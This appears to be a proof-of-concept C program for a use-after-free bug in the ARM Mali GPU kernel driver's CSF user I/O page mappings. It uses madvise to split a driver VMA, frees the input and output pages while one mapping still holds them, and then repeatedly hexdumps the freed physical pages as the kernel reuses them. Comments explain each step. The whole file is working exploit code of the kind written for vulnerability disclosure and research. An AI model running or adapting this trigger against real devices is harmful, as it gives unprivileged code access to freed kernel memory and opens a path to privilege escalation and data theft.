#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

union kbase_ioctl_cs_queue_group_create {
        struct {
                __u64 tiler_mask;
                __u64 fragment_mask;
                __u64 compute_mask;
                __u8 cs_min;
                __u8 priority;
                __u8 tiler_max;
                __u8 fragment_max;
                __u8 compute_max;
                __u8 csi_handlers;
                __u8 padding[2];
                /**
                 * @in.reserved: Reserved
                 */
                __u64 reserved;
        } in;
        struct {
                __u8 group_handle;
                __u8 padding[3];
                __u32 group_uid;
        } out;
};
#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE                                      \
        _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create)

union kbase_ioctl_mem_alloc {
	struct {
		__u64 va_pages;
		__u64 commit_pages;
		__u64 extension;
		__u64 flags;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
	} out;
};
#define KBASE_IOCTL_MEM_ALLOC \
	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

struct kbase_ioctl_mem_free {
	__u64 gpu_addr;
};
#define KBASE_IOCTL_MEM_FREE \
	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)

struct kbase_ioctl_cs_queue_register {
	__u64 buffer_gpu_addr;
	__u32 buffer_size;
	__u8 priority;
	__u8 padding[3];
};
#define KBASE_IOCTL_CS_QUEUE_REGISTER \
	_IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register)

union kbase_ioctl_cs_queue_bind {
	struct {
		__u64 buffer_gpu_addr;
		__u8 group_handle;
		__u8 csi_index;
		__u8 padding[6];
	} in;
	struct {
		__u64 mmap_handle;
	} out;
};
#define KBASE_IOCTL_CS_QUEUE_BIND \
	_IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind)

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
	    16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

int main(void) {
/* We need lots of iterations to spam the kbase_mem_pool so that it actually
 * gives back memory to the kernel's standard page allocator.
 * Note that the bug is only actually triggered in the last iteration.
 */
#define NUM_ROUNDS 0x1500

  unsigned char *victim_maps[NUM_ROUNDS];
  for (unsigned int i=0; i<NUM_ROUNDS;) {
    int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));

    struct kbase_ioctl_version_check vc = {
      .major = 11,
      .minor = 11
    };
    SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
    struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
    SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
    void *tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
			    mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));

    for (int j=0; j<256 && i < NUM_ROUNDS; i++, j++) {
      printf("############### setup round 0x%x\n", i);
      union kbase_ioctl_cs_queue_group_create qgc = {};
      // limit: 256 groups per mali_fd
      SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &qgc));
      int group_handle = qgc.out.group_handle;

      // allocate one page into which we can register a queue
      union kbase_ioctl_mem_alloc ma = {
        .in = { .va_pages = 1, .commit_pages = 1, .flags = 0xf/*RW for CPU+GPU*/ }
      };
      SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
      printf("gpu_va = 0x%lx\n", (unsigned long)ma.out.gpu_va);
      unsigned long gpu_va;
      assert(ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/);
      printf("  gpu_va is cookie, doing real mmap...\n");
      // dark magic: the GPU driver guarantees that the host-virtual
      // address returned by mmap() is the same as the GPU-virtual
      // address.
      // careful, this breaks if we unmap the mmap() allocation
      // without telling mali about it, and then future GPU
      // allocations will fail because of a GPU address collision!
      gpu_va = (unsigned long)SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
			      MAP_SHARED, mali_fd, ma.out.gpu_va));

      struct kbase_ioctl_cs_queue_register cqr = {
        .buffer_gpu_addr = gpu_va,
        .buffer_size = 0x100,
        .priority = 0
      };
      SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_REGISTER, &cqr));
      union kbase_ioctl_cs_queue_bind cqb = {
        .in = {
          .buffer_gpu_addr = gpu_va,
          .group_handle = group_handle,
          .csi_index = 0
        }
      };
      printf("CS_QUEUE_BIND: gpu_addr=0x%lx, handle=%d\n", gpu_va, group_handle);
      SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_BIND, &cqb));
      uint64_t mmap_handle = cqb.out.mmap_handle;
      printf("mmap_handle = 0x%lx\n", (unsigned long)mmap_handle);

      // ******************* interesting part starts here ***********************
      // This hits the kbase_csf_cpu_mmap_user_io_pages() codepath and creates
      // a VMA with ->vm_ops==&kbase_csf_user_io_pages_vm_ops.
      // The VMA has the following layout:
      //  - 0x0000: doorbell page (device page, or dummy page under NO_MALI)
      //  - 0x1000: input page (from kernel page allocator)
      //  - 0x2000: output page (from kernel page allocator)
      // However, the pages are not actually faulted in at this point.
      // Note that this is a VM_PFNMAP mapping, meaning the kernel doesn't do
      // any refcounting of mapped pages - that's the driver's responsibility!
      victim_maps[i] = SYSCHK(mmap(NULL, 0x3000, PROT_READ|PROT_WRITE,
			      MAP_SHARED, mali_fd, mmap_handle));
      printf("victim_map = %p\n", victim_maps[i]);
      // This hits the kbase_csf_user_io_pages_vm_fault() handler, and ensures
      // that the input page and output page are present in the host
      // pagetables.
      *(volatile char *)(victim_maps[i]+0x1000);
      *(volatile char *)(victim_maps[i]+0x2000);
      if (i == NUM_ROUNDS - 1) {
        // Here things start to go wrong:
        // madvise() changes flags on VMAs. When madvise() is told to change
	// flags on an address range whose bounds do not align with existing VMA
        // boundaries, it chops up the VMAs at the range boundaries.
        // Afterwards, the old VMA object covers the first page (the doorbell),
        // while the new VMA (which was passed to
        // kbase_csf_user_io_pages_vm_open()) covers the pages after that
        // (input and output pages).
	// Note that this doesn't touch the host pagetables.
        SYSCHK(madvise(victim_maps[i], 0x1000, MADV_SEQUENTIAL));
      }

      // Instead of *unmapping* without telling mali (problematic,
      // as described above), just clobber the mapping with something
      // else.
      // This still gets rid of mali's VMA, but guarantees we won't
      // ever reuse this host-virtual address range.
      SYSCHK(mmap((void*)gpu_va, 0x1000, PROT_NONE, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
    }

    SYSCHK(munmap(tracking_page, 0x1000));
    SYSCHK(close(mali_fd));
  }
  for (int i=0; i<NUM_ROUNDS; i++) {
    if (i == NUM_ROUNDS - 1) {
      /*
       * Get rid of the original VMA. This triggers the
       * kbase_csf_user_io_pages_close() path, which frees the input/output
       * pages, even though they're still mapped in the copied VMA!
       * Hopefully the previous rounds will have filled up the relevant global
       * kbase_mem_pool, and the per-file pool is going to be destroyed here,
       * so the pages will end up in the kernel's main page allocator.
       */
      SYSCHK(munmap(victim_maps[i], 0x1000));
    } else {
      SYSCHK(munmap(victim_maps[i], 0x3000));
    }
  }

  while (1) {
    /* Dump the page contents.
     * If the kernel has page poisoning enabled (CONFIG_PAGE_POISONING=y and
     * page_poison=1), this should initially show the pages being full of
     * PAGE_POISON (0xaa).
     * Later, if new memory allocations are made, you'll eventually see
     * the data stored by the page's new owner.
     */
    hexdump(victim_maps[NUM_ROUNDS-1]+0x1000, 0x2000);
    sleep(30);
  }
}
